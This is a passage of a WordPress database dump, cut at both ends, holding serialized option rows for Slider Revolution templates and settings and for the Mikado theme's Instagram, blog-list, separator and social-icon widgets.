2\";s:3:\"img\";s:28:\"Paintbrush-Effect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"Paintbrush-Effect/slide3.jpg\";}}s:25:\"black-friday-scroll-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"black-friday-scroll-video/slide1.jpg\";}}s:12:\"charity-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"charity-menu/slide1.jpg\";}}s:14:\"charity-header\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"charity-header/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"charity-header/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"charity-header/slide3.jpg\";}}s:15:\"charity-mission\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"charity-mission/slide1.jpg\";}}s:13:\"charity-funds\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"charity-funds/slide1.jpg\";}}s:15:\"charity-success\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"charity-success/slide1.jpg\";}}s:15:\"charity-stories\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"charity-stories/slide1.jpg\";}}s:16:\"charity-worldmap\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"charity-worldmap/slide1.jpg\";}}s:19:\"charity-large-image\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"charity-large-image/slide1.jpg\";}}s:16:\"charity-sponsors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"charity-sponsors/slide1.jpg\";}}s:12:\"charity-help\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"charity-help/slide1.jpg\";}}s:14:\"charity-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"charity-footer/slide1.jpg\";}}s:21:\"cinematic-hero-titles\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide3.jpg\";}}s:23:\"design-dna-scroll-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"design-dna-scroll-video/slide1.jpg\";}}s:27:\"food-delivery-lottie-scroll\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"food-delivery-lottie-scroll/slide1.jpg\";}}s:20:\"food-recipe-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"food-recipe-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"food-recipe-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"food-recipe-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"food-recipe-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:31:\"food-recipe-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:31:\"food-recipe-carousel/slide6.jpg\";}}s:17:\"food-recipe-modal\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"food-recipe-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"food-recipe-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"food-recipe-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"food-recipe-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:28:\"food-recipe-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:28:\"food-recipe-modal/slide6.jpg\";}}s:27:\"corporate-carousel-template\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"packages/corporate_carousel_bundle.jpg\";}}s:18:\"corporate-carousel\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"corporate-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"corporate-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"corporate-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"corporate-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"corporate-carousel/slide5.jpg\";}}s:18:\"corporate-lightbox\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"corporate-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"corporate-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"corporate-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"corporate-lightbox/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"corporate-lightbox/slide5.jpg\";}}s:23:\"cyber-carousel-template\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"packages/cybercarousel_bundle.jpg\";}}s:14:\"cyber-carousel\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"cyber-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"cyber-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"cyber-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"cyber-carousel/slide4.jpg\";}}s:23:\"cyber-carousel-lightbox\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide4.jpg\";}}s:24:\"woocommerce-carousel-one\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"woocommerce-carousel-one/slide1.jpg\";}}s:31:\"woocommerce-carousel-one-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide6.jpg\";}}s:24:\"woocommerce-carousel-two\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"woocommerce-carousel-two/slide1.jpg\";}}s:31:\"woocommerce-carousel-two-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide6.jpg\";}}s:26:\"woocommerce-feature-slider\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"woocommerce-feature-slider/slide1.jpg\";}}s:33:\"woocommerce-feature-slider-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide6.jpg\";}}s:17:\"woo-liquid-slider\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"woo-liquid-slider/slide1.jpg\";}}s:32:\"woocommerce-liquid-slider-static\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide6.jpg\";}}s:15:\"woo-slider-pack\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"packages/woosliderpack_dynamic.jpg\";}}s:22:\"woo-slider-pack-static\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"packages/woosliderpack_static.jpg\";}}s:24:\"creative-hero-collection\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"creative-hero-collection/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"creative-hero-collection/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"creative-hero-collection/slide3.jpg\";}}s:19:\"photographer-slider\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"photographer-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"photographer-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"photographer-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:30:\"photographer-slider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:30:\"photographer-slider/slide5.jpg\";}}s:17:\"realestate-slider\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"realestate-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"realestate-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"realestate-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"realestate-slider/slide4.jpg\";}}s:19:\"saas-product-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"saas-product-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"saas-product-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"saas-product-slider/slide3.jpg\";}}s:27:\"cinematic-wildlife-template\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:39:\"packages/cinematic-wildlife-package.jpg\";}}s:25:\"cinematic-wildlife-slider\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:36:\"cinematic-wildlife-slider/slide7.jpg\";}}s:24:\"cinematic-wildlife-modal\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:35:\"cinematic-wildlife-modal/slide7.jpg\";}}}}','no'),(286308,'rs-templates-counter','3','no'),(286309,'revslider_table_version','1.0.8','yes'),(286312,'revslider-global-settings','{\"version\":\"6.2.0\",\"permission\":\"admin\",\"includeids\":\"\",\"script\":{\"footer\":false,\"defer\":false,\"full\":false},\"fonturl\":\"\",\"size\":{\"desktop\":1240,\"notebook\":1024,\"tablet\":778,\"mobile\":480}}','yes'),(286313,'revslider_update_version','6.2.0','yes'),(286314,'widget_mkdf_instagram_widget','a:3:{i:2;a:8:{s:5:\"title\";s:9:\"Instagram\";s:4:\"type\";s:7:\"gallery\";s:14:\"number_of_cols\";s:1:\"1\";s:16:\"number_of_photos\";s:1:\"1\";s:10:\"image_size\";s:19:\"standard_resolution\";s:19:\"space_between_items\";s:6:\"medium\";s:19:\"show_instagram_icon\";s:2:\"no\";s:14:\"transient_time\";s:7:\"3153600\";}i:3;a:8:{s:5:\"title\";s:9:\"Instagram\";s:4:\"type\";s:7:\"gallery\";s:14:\"number_of_cols\";s:1:\"1\";s:16:\"number_of_photos\";s:1:\"1\";s:10:\"image_size\";s:19:\"standard_resolution\";s:19:\"space_between_items\";s:6:\"medium\";s:19:\"show_instagram_icon\";s:2:\"no\";s:14:\"transient_time\";s:7:\"3153600\";}s:12:\"_multiwidget\";i:1;}','yes'),(286315,'widget_mkdf_twitter_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286316,'widget_mkdf_author_info_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286317,'widget_mkdf_blog_list_widget','a:2:{i:2;a:11:{s:20:\"widget_bottom_margin\";s:0:\"\";s:12:\"widget_title\";s:12:\"Latest Posts\";s:26:\"widget_title_bottom_margin\";s:0:\"\";s:4:\"type\";s:6:\"simple\";s:15:\"number_of_posts\";s:1:\"3\";s:19:\"space_between_items\";s:6:\"medium\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:3:\"ASC\";s:8:\"category\";s:8:\"recepies\";s:9:\"title_tag\";s:1:\"p\";s:15:\"title_transform\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(286318,'widget_mkdf_button_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286319,'widget_mkdf_contact_form_7_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286320,'widget_mkdf_custom_font_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286321,'widget_mkdf_icon_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286322,'widget_mkdf_image_gallery_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286323,'widget_mkdf_recent_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286324,'widget_mkdf_search_post_type','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286325,'widget_mkdf_separator_widget','a:4:{i:2;a:8:{s:4:\"type\";s:10:\"full-width\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:7:\"#ffffff\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:0:\"\";s:13:\"bottom_margin\";s:4:\"35px\";}i:3;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:11:\"transparent\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:4:\"13px\";s:13:\"bottom_margin\";s:0:\"\";}i:4;a:8:{s:4:\"type\";s:6:\"normal\";s:8:\"position\";s:6:\"center\";s:12:\"border_style\";s:5:\"solid\";s:5:\"color\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thickness\";s:0:\"\";s:10:\"top_margin\";s:0:\"\";s:13:\"bottom_margin\";s:3:\"2px\";}s:12:\"_multiwidget\";i:1;}','yes'),(286326,'widget_mkdf_social_icon_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286327,'widget_mkdf_social_icons_group_widget','a:6:{i:2;a:45:{s:12:\"widget_title\";s:0:\"\";s:9:\"icon_pack\";s:17:\"simple_line_icons\";s:9:\"fe_icon_1\";s:0:\"\";s:9:\"fa_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:20:\"icon-social-facebook\";s:6:\"link_1\";s:21:\"https://facebook.com/\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fe_icon_2\";s:0:\"\";s:9:\"fa_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:21:\"icon-social-instagram\";s:6:\"link_2\";s:26:\"https://www.instagram.com/\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fe_icon_3\";s:0:\"\";s:9:\"fa_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:19:\"icon-social-twitter\";s:6:\"link_3\";s:20:\"https://twitter.com/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fe_icon_4\";s:0:\"\";s:9:\"fa_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:0:\"\";s:8:\"target_4\";s:5:\"_self\";s:9:\"fe_icon_5\";s:0:\"\";s:9:\"fa_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:0:\"\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fe_icon_6\";s:0:\"\";s:9:\"fa_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"16px\";s:5:\"color\";s:7:\"#111111\";s:11:\"hover_color\";s:7:\"#a1a1a1\";s:6:\"margin\";s:0:\"\";}i:3;a:45:{s:12:\"widget_title\";s:6:\"Follow\";s:9:\"icon_pack\";s:17:\"simple_line_icons\";s:9:\"fe_icon_1\";s:0:\"\";s:9:\"fa_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:20:\"icon-social-facebook\";s:6:\"link_1\";s:21:\"https://facebook.com/\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fe_icon_2\";s:0:\"\";s:9:\"fa_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:21:\"icon-social-instagram\";s:6:\"link_2\";s:26:\"https://www.instagram.com/\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fe_icon_3\";s:0:\"\";s:9:\"fa_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:19:\"icon-social-twitter\";s:6:\"link_3\";s:20:\"https://twitter.com/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fe_icon_4\";s:0:\"\";s:9:\"fa_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:0:\"\";s:8:\"target_4\";s:6:\"_blank\";s:9:\"fe_icon_5\";s:0:\"\";s:9:\"fa_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:0:\"\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fe_icon_6\";s:0:\"\";s:9:\"fa_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"16px\";s:5:\"color\";s:7:\"#111111\";s:11:\"hover_color\";s:7:\"#a1a1a1\";s:6:\"margin\";s:0:\"\";}i:4;a:45:{s:12:\"widget_title\";s:0:\"\";s:9:\"icon_pack\";s:17:\"simple_line_icons\";s:9:\"fe_icon_1\";s:0:\"\";s:9:\"fa_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:20:\"icon-social-facebook\";s:6:\"link_1\";s:21:\"https://facebook.com/\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fe_icon_2\";s:0:\"\";s:9:\"fa_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:21:\"icon-social-instagram\";s:6:\"link_2\";s:26:\"https://www.instagram.com/\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fe_icon_3\";s:0:\"\";s:9:\"fa_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:19:\"icon-social-twitter\";s:6:\"link_3\";s:20:\"https://twitter.com/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fe_icon_4\";s:0:\"\";s:9:\"fa_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:0:\"\";s:8:\"target_4\";s:6:\"_blank\";s:9:\"fe_icon_5\";s:0:\"\";s:9:\"fa_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:0:\"\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fe_icon_6\";s:0:\"\";s:9:\"fa_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:6:\"_blank\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"16px\";s:5:\"color\";s:7:\"#111111\";s:11:\"hover_color\";s:7:\"#a1a1a1\";s:6:\"margin\";s:0:\"\";}i:5;a:45:{s:12:\"widget_title\";s:6:\"Follow\";s:9:\"icon_pack\";s:17:\"simple_line_icons\";s:9:\"fe_icon_1\";s:0:\"\";s:9:\"fa_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:20:\"icon-social-facebook\";s:6:\"link_1\";s:21:\"https://facebook.com/\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fe_icon_2\";s:0:\"\";s:9:\"fa_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:21:\"icon-social-instagram\";s:6:\"link_2\";s:26:\"https://www.instagram.com/\";s:8:\"target_2\";s:6:\"_blank\";s:9:\"fe_icon_3\";s:0:\"\";s:9:\"fa_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:19:\"icon-social-twitter\";s:6:\"link_3\";s:20:\"https://twitter.com/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fe_icon_4\";s:0:\"\";s:9:\"fa_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:0:\"\";s:8:\"target_4\";s:5:\"_self\";s:9:\"fe_icon_5\";s:0:\"\";s:9:\"fa_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:0:\"\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fe_icon_6\";s:0:\"\";s:9:\"fa_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:0:\"\";s:5:\"color\";s:7:\"#111111\";s:11:\"hover_color\";s:7:\"#a1a1a1\";s:6:\"margin\";s:0:\"\";}i:6;a:45:{s:12:\"widget_title\";s:0:\"\";s:9:\"icon_pack\";s:17:\"simple_line_icons\";s:9:\"fe_icon_1\";s:0:\"\";s:9:\"fa_icon_1\";s:0:\"\";s:10:\"ion_icon_1\";s:0:\"\";s:18:\"simple_line_icon_1\";s:20:\"icon-social-facebook\";s:6:\"link_1\";s:21:\"https://facebook.com/\";s:8:\"target_1\";s:6:\"_blank\";s:9:\"fe_icon_2\";s:0:\"\";s:9:\"fa_icon_2\";s:0:\"\";s:10:\"ion_icon_2\";s:0:\"\";s:18:\"simple_line_icon_2\";s:21:\"icon-social-instagram\";s:6:\"link_2\";s:26:\"https://www.instagram.com/\";s:8:\